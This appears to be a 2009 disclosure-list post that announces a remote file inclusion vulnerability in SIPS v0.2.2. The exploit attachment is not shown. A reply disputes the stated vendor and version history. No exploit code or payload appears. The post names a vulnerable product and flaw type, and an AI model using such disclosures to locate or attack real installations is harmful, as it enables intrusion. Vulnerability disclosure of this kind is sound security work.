SIPS v0.2.2 Remote File Inclusion Vulnerability

Hi Dear,
Please publish this bug.
Thank you

[Attachment: SIPS v0.2.2.txt]


Replies to this exploit:

From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/